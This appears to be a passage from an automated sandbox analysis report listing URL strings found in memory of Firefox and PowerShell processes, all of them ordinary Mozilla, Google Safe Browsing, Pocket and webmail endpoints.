Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3302124352.000001A8A5FDD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3287438057.0000029D56372000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2B86000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3285380485.000001F42CD8F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestError
Source: firefox.exe, 00000016.00000002.3287438057.0000029D56372000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggestabout
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 00000010.00000002.3313124001.000001A8B3120000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mochitest.youtube.com/
Source: firefox.exe, 00000010.00000002.3302124352.000001A8A5F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B4995000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mozilla-hub.atlassian.net/browse/SDK-405
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mzl.la/3NS9KJd
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: powershell.exe, 00000007.00000002.3051147504.0000000005AD3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3259252451.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3107521388.000001A8B8BB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ok.ru/
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3326090847.000001A8B677F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3221122829.000001A8B677F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s:
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 00000010.00000003.3144090733.000001A8B7F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3144473251.000001A8B7F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3140660799.000001A8B7F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3313124001.000001A8B3120000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/page/
Source: firefox.exe, 00000010.00000003.3144090733.000001A8B7F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3144473251.000001A8B7F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3140660799.000001A8B7F67000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3313124001.000001A8B3120000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/player/
Source: firefox.exe, 00000010.00000003.3065247433.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3165389836.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3326090847.000001A8B677F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3327649126.000001A8B69DE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3221122829.000001A8B677F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s987b474c-0394-42cb-b0b9-f5bb10befaec
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sbrowser.fixup.domainsuffixwhitelist.Can
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B6190000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com/
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.comvalidateProfilerWebChannelUrladdDevToolsItemsToSubviewtoggleProfilerKeyS
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://push.services.mozilla.com
Source: firefox.exe, 00000010.00000002.3320702661.000001A8B61F4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://push.services.mozilla.com/
Source: firefox.exe, 00000010.00000003.3236863796.000001A8C06F0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000010.00000002.3336939375.000001A8B74B8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/accounts/profile/?utm_medium=firefox-desktop&utm_source=modal&utm_campaign
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://relay.firefox.com/api/v1/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/diagnostic?site=
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%
Source: firefox.exe, 00000010.00000002.3336939375.000001A8B74B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/downloads?client=SAFEBROWSING_ID&appver=118.0&pver=2.2&
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&p
Source: firefox.exe, 00000010.00000003.3267294438.000001A8B9270000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.google.com/safebrowsing/gethash?client=SAFEBROWSING_ID&appver=118.0&pver=2.2
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=%GOOGLE_SAFEBR
Source: firefox.exe, 00000010.00000002.3336939375.000001A8B74B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatHits?$ct=application/x-protobuf&key=%GOOGLE_SAFEBROWSIN
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=%GOOGL
Source: firefox.exe, 00000010.00000002.3336939375.000001A8B74B8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://sb-ssl.google.com/safebrowsing/clientreport/download?key=%GOOGLE_SAFEBROWSING_API_KEY%
Source: firefox.exe, 00000010.00000002.3302124352.000001A8A5F03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3316913295.000001A8B4995000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000010.00000003.3048393713.000001A8B6D36000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/shims/rambler-authenticator.js
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3373000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/shims/rambler-authenticator.jsinternal:privateBrowsingAllowedshims/a
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.combrowser.handlers.migrationsbrowser.tabs.drawInTitlebarSHUTDOWN_CACHE_
Source: firefox.exe, 00000010.00000003.3125375221.000001A8B7F39000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://searchfox.org/mozilla-central/source/toolkit/components/search/SearchUtils.jsm#145-152
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/abuse/report/addon/
Source: firefox.exe, 00000010.00000002.3327834513.000001A8B6A25000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/language-tools/?app=firefox&type=language&appversi
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/search/?guid=%IDS%&lang=%LOCALE%
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/discovery/?lang=%LOCALE%&edition=%DISTRIBUTION%
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v5/addons/browser-mappings/?browser=%BROWSER%
Source: firefox.exe, 00000010.00000002.3339830804.000001A8B7BEE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com
Source: firefox.exe, 00000010.00000002.3340745234.000001A8B7CA4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000010.00000002.3340745234.000001A8B7CAB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3235000171.000001A8C38C9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=SAFEBROWSING_ID&appver=%MAJOR_VERSION%&pver=2.2
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/gethash?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 00000010.00000002.3304042772.000001A8A79C0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000016.00000002.3286589143.0000029D56150000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285141971.000002B9C29B0000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001F.00000002.3284580790.000001F42CB60000.00000002.10000000.00040000.00000000.sdmp String found in binary or memory: https://snippets.cdn.mozilla.net/%STARTPAGE_VERSION%/%NAME%/%VERSION%/%APPBUILDID%/%BUILD_TARGET%/%L
Source: firefox.exe, 00000010.00000002.3340745234.000001A8B7CA4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3239633365.000001A8C31DE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 00000010.00000003.3236109486.000001A8C33BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2B12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3285380485.000001F42CD13000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B33DD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/Endpoint
Source: firefox.exe, 00000010.00000003.3236109486.000001A8C33BE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000010.00000003.3239864513.000001A8BFFE2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000002.3320702661.000001A8B617A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000010.00000003.3236863796.000001A8C06C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.3285942438.000002B9C2BBA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001F.00000002.3285380485.000001F42CDF4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000010.00000002.3314397385.000001A8B3303000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
